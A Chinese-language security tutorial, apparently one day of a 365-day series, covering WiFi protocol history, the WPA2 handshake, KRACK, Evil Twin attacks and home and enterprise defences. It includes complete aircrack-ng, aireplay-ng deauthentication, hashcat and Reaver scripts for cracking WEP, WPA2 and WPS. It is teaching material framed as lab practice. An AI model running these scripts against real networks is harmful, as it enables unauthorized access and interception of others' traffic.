Day-010-无线网络基础与安全 802.11

# Day 09: 无线网络基础与安全（802.11）

> 网络安全系列第 9 天 | 预计阅读时间：35 分钟 | 难度：★★★★☆

---

## 清单 目录

1. [WiFi 安全演进](#wifi 安全演进)
2. [802.11 协议基础](#80211 协议基础)
3. [WEP 安全分析](#wep 安全分析)
4. [WPA/WPA2 安全](#wpawpa2 安全)
5. [WPA3 新特性](#wpa3 新特性)
6. [无线攻击技术](#无线攻击技术)
7. [实验环境搭建](#实验环境搭建)
8. [实战演练](#实战演练)
9. [防护策略与最佳实践](#防护策略与最佳实践)
10. [总结与思考](#总结与思考)
11. [参考资料](#参考资料)

---

## WiFi 安全演进

### 无线安全发展史

WiFi 安全的发展是一部"攻防对抗史"，每个新标准的诞生都源于前一代被攻破。

```
1997: WEP（Wired Equivalent Privacy）
│
├─ 设计目标：提供与有线网络等价的安全
├─ 加密算法：RC4 流密码
├─ 密钥长度：64/128 位
├─ 致命缺陷：
│  - IV 空间太小（24 位，仅 1600 万种）
│  - RC4 密钥调度弱点
│  - 完整性校验可伪造
└─ 2001 年：被完全破解

2003: WPA（WiFi Protected Access）
│
├─ 设计目标：临时替代方案（过渡）
├─ 加密算法：TKIP（临时密钥完整性协议）
├─ 改进：
│  - 动态密钥
│  - 消息完整性检查
│  - 重放保护
└─ 2008 年：TKIP 被破解

2004: WPA2（802.11i）
│
├─ 设计目标：正式标准
├─ 加密算法：AES-CCMP
├─ 改进：
│  - 强加密（AES）
│  - 完整 802.1X 认证
│  - 密钥管理改进
├─ 2017 年：KRACK 攻击（握手漏洞）
└─ 当前：仍广泛使用

2018: WPA3
│
├─ 设计目标：应对现代威胁
├─ 新特性：
│  - SAE（对等实体同时认证）
│  - 防字典攻击
│  - 前向安全
│  - 192 位加密套件
└─ 当前：逐步普及
```

### 真实案例

**案例 1: TJX 数据泄露（2007）**
```
时间：2005-2007 年
影响：4570 万信用卡被盗
原因：使用 WEP 加密

事件经过：
1. 攻击者发现 TJX 商店使用 WEP
2. 在停车场捕获无线流量
3. 破解 WEP 密钥（几分钟）
4. 访问内部网络
5. 窃取信用卡数据

后果：
- 2.56 亿美元损失
- 多项诉讼
- 声誉受损

教训：
- WEP 不安全，必须禁用
- 无线网络需要隔离
- 需要持续监控
```

**案例 2: KRACK 攻击（2017）**
```
时间：2017 年 10 月
影响：所有 WPA2 设备
原因：握手协议漏洞

事件经过：
1. 研究人员发现 WPA2 握手漏洞
2. 可重传第 3 步握手消息
3. 导致密钥重装
4. 加密被绕过

影响范围：
- Android: 80% 设备受影响
- Linux: 使用 wpa_supplicant 的设备
- Windows: 部分版本
- iOS/macOS: 影响较小

修复：
- 更新固件
- 使用 WPA3
- 启用 HTTPS

教训：
- 协议设计需要形式化验证
- 需要快速补丁机制
- 纵深防御重要性
```

---

## 802.11 协议基础

### 无线网络组件

```
STA（Station，站点）：
- 客户端设备
- 手机、笔记本、IoT 设备
- 每个 STA 有唯一 MAC 地址

AP（Access Point，接入点）：
- 无线接入点
- 连接无线和有线网络
- 管理无线客户端

SSID（Service Set Identifier）：
- 网络名称
- 最多 32 字符
- 可隐藏（不广播）

BSSID（Basic Service Set ID）：
- AP 的 MAC 地址
- 唯一标识 AP
- 用于区分同名网络

Channel（信道）：
- 2.4GHz: 1-14 信道
- 5GHz: 36-165 信道
- 中国常用：1-13（2.4G），36-64（5G）
```

### 四步握手详解

**WPA2 四步握手**是无线安全的核心，理解它对于理解 WPA2 攻击至关重要。

```
握手目标：
1. 确认双方知道 PMK（主密钥）
2. 生成 PTK（成对临时密钥）
3. 安装加密密钥

握手流程：

┌──────────┐                    ┌──────────┐
│  客户端  │                    │    AP    │
└────┬─────┘                    └────┬─────┘
     │                               │
     │  1. ANonce                    │
     │◄──────────────────────────────│
     │   (AP 随机数)                  │
     │                               │
     │  2. SNonce + MIC              │
     │──────────────────────────────►│
     │   (客户端随机数 + 完整性校验)   │
     │                               │
     │  3. GTK + MIC                 │
     │◄──────────────────────────────│
     │   (组密钥 + 完整性校验)        │
     │                               │
     │  4. ACK                       │
     │──────────────────────────────►│
     │   (确认)                      │
     │                               │
     │  握手完成，开始加密通信        │
     │◄──────────────────────────────►│

密钥派生：
PMK（主密钥）= PBKDF2(密码，SSID, 4096, 256)
PTK（成对密钥）= PRF(PMK, "Pairwise key expansion",
                     Min(AP_MAC, STA_MAC) || Max(AP_MAC, STA_MAC),
                     Min(ANonce, SNonce) || Max(ANonce, SNonce))

PTK 分为：
- KCK（密钥确认密钥）：128 位，用于 MIC
- KEK（密钥加密密钥）：128 位，用于加密 GTK
- TK（临时密钥）：128/256 位，用于数据加密
```

---

## WEP 安全分析

### WEP 漏洞详解

**为什么 WEP 被完全破解？**

```
漏洞 1: IV 空间太小

WEP 使用 24 位 IV（初始化向量），
总共只有 2^24 = 16,777,216 种可能。

在繁忙的网络中：
- 每秒 1000 个包
- 16,777,216 / 1000 = 16,777 秒 ≈ 4.6 小时

4.6 小时后 IV 必然重复，
一旦 IV 重复，密钥流重复，
攻击者可 XOR 两个密文，消除密钥流，
得到两个明文的 XOR，进而破解。

漏洞 2: RC4 密钥调度弱点

RC4 密钥调度算法（KSA）存在弱点，
某些 IV 值会泄露密钥信息。

FMS 攻击（Fluhrer, Mantin, Shamir）：
- 利用"弱 IV"
- 收集足够多的弱 IV
- 统计分析恢复密钥
- 通常只需 5-10 万包

漏洞 3: 完整性校验可伪造

WEP 使用 CRC32 作为完整性校验，
CRC32 是线性的，
攻击者可以：
1. 修改密文
2. 相应修改 CRC
3. 接收方验证通过

结果：可篡改数据而不被发现。
```

### WEP 破解实战

**使用 Aircrack-ng 破解 WEP**：
```bash
#!/bin/bash
# wep_crack.sh
# WEP 破解完整流程

set -e

echo "=== WEP 破解流程 ==="

# 1. 启用监控模式
echo "[1/5] 启用监控模式..."
airmon-ng start wlan0
# 创建 wlan0mon 接口

# 2. 扫描网络
echo "[2/5] 扫描无线网络..."
airodump-ng wlan0mon
# 记录目标 BSSID、信道

# 3. 捕获数据包
echo "[3/5] 捕获数据包..."
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep_cap wlan0mon
# 在另一个终端执行下一步

# 4. ARP 重放攻击（加速数据收集）
echo "[4/5] ARP 重放攻击..."
# 等待客户端连接
aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h CLIENT_MAC wlan0mon
# 快速生成大量数据包

# 5. 破解密钥
echo "[5/5] 破解 WEP 密钥..."
aircrack-ng wep_cap-01.cap
# 通常几分钟内破解

echo "=== 破解完成 ==="
```

**破解时间统计**：
```
数据包数量 vs 破解成功率：

20,000 包：50% 成功率
40,000 包：80% 成功率
80,000 包：95% 成功率
200,000 包：99% 成功率

实际时间：
- 被动收集：10-30 分钟
- 主动攻击（ARP 重放）：1-5 分钟
```

---

## WPA/WPA2 安全

### WPA2 安全机制

**WPA2 相比 WEP 的改进**：
```
1. 加密算法
   WEP: RC4（流密码，弱点多）
   WPA2: AES-CCMP（块密码，强度高）

2. 密钥管理
   WEP: 静态密钥，所有用户共享
   WPA2: 动态密钥，每用户独立

3. 完整性保护
   WEP: CRC32（可伪造）
   WPA2: CBC-MAC（不可伪造）

4. 重放保护
   WEP: 无
   WPA2: 序列号机制

5. 认证机制
   WEP: 共享密钥认证（弱）
   WPA2: 802.1X/EAP 或 PSK
```

### KRACK 攻击详解

**什么是 KRACK 攻击？**
```
KRACK（Key Reinstallation Attack，密钥重装攻击）
是 2017 年发现的 WPA2 协议漏洞。

攻击原理：
1. 攻击者拦截第 3 步握手消息
2. 阻止客户端收到
3. 客户端超时，重传第 2 步
4. AP 重传第 3 步
5. 客户端重装相同的密钥
6. 加密计数器重置
7. 攻击者可解密/篡改流量

影响范围：
- Android 6.0+: 最严重（可解密所有流量）
- Linux: 严重
- Windows: 中等
- iOS/macOS: 较轻

修复：
- 更新 wpa_supplicant
- 更新操作系统
- 使用 WPA3
```

### WPA2 破解实战

**使用 Hashcat 破解 WPA2**：
```bash
#!/bin/bash
# wpa2_crack.sh
# WPA2 破解流程

set -e

echo "=== WPA2 破解流程 ==="

# 1. 启用监控模式
echo "[1/5] 启用监控模式..."
airmon-ng start wlan0

# 2. 扫描网络
echo "[2/5] 扫描网络..."
airodump-ng wlan0mon

# 3. 捕获握手包
echo "[3/5] 捕获握手包..."
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa2_cap wlan0mon
# 在另一个终端执行下一步

# 4. 取消认证（强制重新握手）
echo "[4/5] 取消认证..."
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon
# 发送 5 个取消认证包

# 5. 验证握手包
echo "[5/5] 验证握手包..."
aircrack-ng wpa2_cap-01.cap -w /dev/null
# 应显示"Key not found"但有握手图标

# 6. 转换为 Hashcat 格式
hcxpcaptool -z wpa2_hash wpa2_cap-01.cap

# 7. 字典破解
echo "开始字典破解..."
hashcat -m 2500 wpa2_hash wordlist.txt
# -m 2500: WPA2 模式

# 8. 显示密码
hashcat --show -m 2500 wpa2_hash

echo "=== 破解完成 ==="
```

**破解成功率**：
```
字典大小 vs 成功率：

常用密码（top 1000）: 30%
中等字典（100 万）: 60%
大字典（1 亿）: 80%
规则攻击：+10-20%

时间估算（GTX 1080 Ti）：
- 8 字符纯数字：几秒
- 8 字符字母：几分钟
- 8 字符混合：几小时
- 10 字符混合：不现实

建议：
- 使用强密码（12+ 字符）
- 使用密码短语
- 避免常见密码
```

---

## WPA3 新特性

### WPA3 核心改进

**SAE（Simultaneous Authentication of Equals）**：
```
SAE 替代了 WPA2 的 PSK 握手，
提供更强的安全性。

SAE 握手流程：
1. 客户端和 AP 交换承诺
2. 双方独立计算共享密钥
3. 相互验证
4. 派生会话密钥

优势：
✓ 防字典攻击
  - 每次握手使用不同参数
  - 离线字典攻击无效
  
✓ 前向安全
  - 即使密码泄露
  - 历史会话仍安全
  
✓ 防中间人攻击
  - 双向认证
  - 密钥确认
```

**其他 WPA3 特性**：
```
1. 192 位加密套件
   - 面向企业/政府
   - CNSA（商业国家安全算法）兼容
   - 更高安全级别

2. OWE（Opportunistic Wireless Encryption）
   - 开放网络加密
   - 无需密码
   - 防被动窃听

3. 易连接（Easy Connect）
   - 二维码配网
   - IoT 设备友好
   - 基于公钥密码
```

---

## 无线攻击技术

### 攻击分类

```
1. 被动攻击
   - 流量嗅探
   - 元数据分析
   - 难以检测

2. 主动攻击
   - 取消认证
   - Evil Twin
   - KRACK
   - 可被检测

3. 物理攻击
   - 信号干扰
   - 定向天线
   - 需要设备
```

### Evil Twin 攻击

**原理详解**：
```
Evil Twin（邪恶双胞胎）攻击是
创建一个与合法 AP 同名的恶意 AP，
诱使用户连接。

攻击流程：

1. 侦察
   扫描周围 AP
   记录 SSID、BSSID、信道

2. 创建恶意 AP
   SSID: 与合法 AP 相同
   信道：相同
   信号强度：更强

3. 取消认证
   向合法 AP 的客户端
   发送取消认证包
   强制断开连接

4. 客户端重连
   客户端自动搜索
   恶意 AP 信号更强
   连接到恶意 AP

5. 中间人攻击
   所有流量经过攻击者
   可窃听、篡改

防御：
- 使用 WPA3
- 验证证书
- 使用 VPN
- 用户教育
```

---

## 实验环境搭建

### 硬件要求

```
无线网卡（支持监控模式）：

推荐芯片：
✓ Atheros AR9271
  - 兼容性好
  - 支持监控
  - 价格适中
  
✓ Ralink RT3070
  - 便宜
  - 支持监控
  - 性能一般
  
✓ Realtek RTL8812AU
  - 支持 AC
  - 支持监控
  - 需要驱动

不推荐：
✗ Intel 内置网卡
  - 通常不支持监控
  - 功率低

✗ 未知芯片
  - 驱动问题
  - 兼容性问题
```

### 工具安装

```bash
#!/bin/bash
# wireless_tools_install.sh
# 无线安全工具安装

set -e

echo "=== 安装无线安全工具 ==="

# Aircrack-ng 套件
apt install -y aircrack-ng

# 额外工具
apt install -y reaver bully wifite2

# Kismet（无线 IDS）
apt install -y kismet

# 验证安装
aircrack-ng --version
reaver --help
wifite --version

echo "=== 安装完成 ==="
```

---

## 实战演练

### 实验 1: 监控模式配置

**目标**：配置无线监控

**步骤**：
```bash
# 1. 查看无线接口
iwconfig
# 应看到 wlan0 或类似

# 2. 停止网络管理器
systemctl stop NetworkManager

# 3. 启用监控模式
airmon-ng start wlan0
# 创建 wlan0mon 接口

# 4. 验证监控模式
iwconfig wlan0mon
# Mode:Monitor

# 5. 扫描网络
airodump-ng wlan0mon
# 应看到周围 AP

# 6. 停止监控
airmon-ng stop wlan0mon
```

### 实验 2: WPA2 握手捕获

**目标**：捕获 WPA2 握手

**步骤**：
```bash
# 1. 扫描网络
airodump-ng wlan0mon
# 记录目标 BSSID、信道、客户端

# 2. 捕获握手
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa2_cap wlan0mon

# 3. 取消认证（另一终端）
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon

# 4. 验证握手
aircrack-ng wpa2_cap-01.cap
# 右上角应显示握手图标

# 5. 保存握手包
# 用于后续破解练习
```

### 实验 3: WPS 攻击

**目标**：测试 WPS 漏洞

**步骤**：
```bash
# 1. 检测 WPS
wash -i wlan0mon
# 列出支持 WPS 的 AP

# 2. Reaver 攻击
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
# -vv: 详细输出

# 3. 观察进度
# 通常几小时内破解

# 4. Bully（替代工具）
bully wlan0mon --bssid AA:BB:CC:DD:EE:FF

# 防御：
# 禁用 WPS 功能
```

---

## 防护策略与最佳实践

### 家庭网络

```
推荐配置：

1. 加密
   ✓ 使用 WPA3（如支持）
   ✓ 或 WPA2-AES
   ✓ 禁用 WEP/WPA

2. 密码
   ✓ 16+ 字符
   ✓ 大小写 + 数字 + 符号
   ✓ 不使用常见密码

3. 其他
   ✓ 禁用 WPS
   ✓ 隐藏 SSID（有限保护）
   ✓ MAC 过滤（辅助）
   ✓ 定期更新固件
   ✓ 访客网络隔离
```

### 企业网络

```
推荐配置：

1. 认证
   ✓ WPA2/3-Enterprise
   ✓ 802.1X 认证
   ✓ RADIUS 服务器
   ✓ 证书认证

2. 隔离
   ✓ 访客网络独立
   ✓ VLAN 分段
   ✓ 客户端隔离

3. 监控
   ✓ 无线 IDS
   ✓ 异常检测
   ✓ Rogue AP 检测

4. 管理
   ✓ 集中管理
   ✓ 定期审计
   ✓ 固件更新
```

---

## 总结与思考

### 核心要点回顾

1. **WEP**: 已破解，绝对禁止使用
2. **WPA2**: 当前主流，需强密码
3. **WPA3**: 推荐，更安全
4. **攻击技术**: 了解以更好防御

### 深入思考问题

1. **WPA3 采用率低的原因**？
   - 设备支持不足
   - 成本考虑
   - 意识不足

2. **5G WiFi 安全特性**？
   - 更高频率
   - 更多信道
   - 安全相同

3. **物联网设备无线安全**？
   - 设备能力有限
   - 更新困难
   - 如何保护？

### 实战建议

**个人用户**：
```
1. 加密配置
   ✓ 使用 WPA3（如路由器支持）
   ✓ 或 WPA2-AES（广泛兼容）
   ✓ 绝对禁用 WEP/WPA-TKIP

2. 密码设置
   ✓ 16+ 字符密码短语
   ✓ 大小写 + 数字 + 符号
   ✓ 不使用字典单词
   ✓ 示例：MyHome_WiFi_2024!Secure

3. 路由器配置
   ✓ 定期更新固件
   ✓ 禁用 WPS
   ✓ 启用访客网络
   ✓ 关闭远程管理

4. 使用习惯
   ✓ 公共 WiFi 使用 VPN
   ✓ 不连接开放网络
   ✓ 验证网络名称
   ✓ 关闭自动连接
```

**企业用户**：
```
1. 认证架构
   ✓ 802.1X 认证
   ✓ RADIUS 服务器（如 FreeRADIUS）
   ✓ 证书认证或用户名密码
   ✓ 与 AD/LDAP 集成

2. 网络设计
   ✓ 访客网络独立 VLAN
   ✓ 员工网络分段
   ✓ IoT 设备隔离
   ✓ 无线控制器集中管理

3. 安全监控
   ✓ 无线 IDS/IPS
   ✓ Rogue AP 检测
   ✓ 异常行为分析
   ✓ 客户端合规检查

4. 运维管理
   ✓ 定期安全审计
   ✓ 固件更新流程
   ✓ 事件响应预案
   ✓ 用户安全意识培训
```

**云环境/远程办公**：
```
1. 远程访问
   ✓ VPN 连接
   ✓ 零信任网络访问
   ✓ 多因素认证

2. 设备管理
   ✓ MDM（移动设备管理）
   ✓ 设备合规检查
   ✓ 远程擦除能力

3. 数据保护
   ✓ 端到端加密
   ✓ DLP（数据防泄露）
   ✓ 云访问安全代理
```

---

## 参考资料

### 标准文档
- IEEE 802.11 (WiFi 标准)
- IEEE 802.11i (WPA2)
- WPA3 规范

### 工具资源
- [Aircrack-ng](https://www.aircrack-ng.org/)
- [Kismet](https://www.kismetwireless.net/)
- [Hashcat](https://hashcat.net/)

### 在线资源
- [WiFi 安全指南](https://www.sans.org/)
- [KRACK 攻击详情](https://www.krackattacks.com/)

### 书籍推荐
- 《Hacking Wireless Networks》
- 《WiFi 安全实战》
- 《无线网络安全技术》

---

**标记 明日预告**：Day 10 - 网络访问控制（802.1X/NAC）

> 本文内容仅供学习和研究使用，请勿用于非法目的。所有实验请在隔离环境中进行。

---

*本文是 365 天信息安全技术系列的第 9 篇，精编版本*